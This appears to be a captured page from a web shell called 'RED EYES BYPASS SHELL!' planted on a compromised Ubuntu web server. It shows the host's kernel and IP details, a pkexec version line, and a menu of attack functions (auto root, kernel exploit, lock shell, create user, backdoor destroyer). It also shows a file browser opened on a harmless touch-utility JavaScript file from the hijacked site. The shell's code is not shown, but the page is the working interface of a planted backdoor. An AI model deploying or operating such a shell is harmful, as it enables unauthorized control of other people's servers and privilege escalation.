Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
pdpa /
src /
js /
mdb /
util /
touch /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
index.js
1.21
KB
-rwxr-xr-x
swipe.js
1.92
KB
-rwxr-xr-x
touchUtil.js
465
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : touchUtil.js
class TouchUtil { _getCoordinates(e) { const [touch] = e.touches; return { x: touch.clientX, y: touch.clientY, }; } _getDirection(displacement) { return { x: { direction: displacement.x < 0 ? 'left' : 'right', value: Math.abs(displacement.x), }, y: { direction: displacement.y < 0 ? 'up' : 'down', value: Math.abs(displacement.y), }, }; } } export default TouchUtil;
Close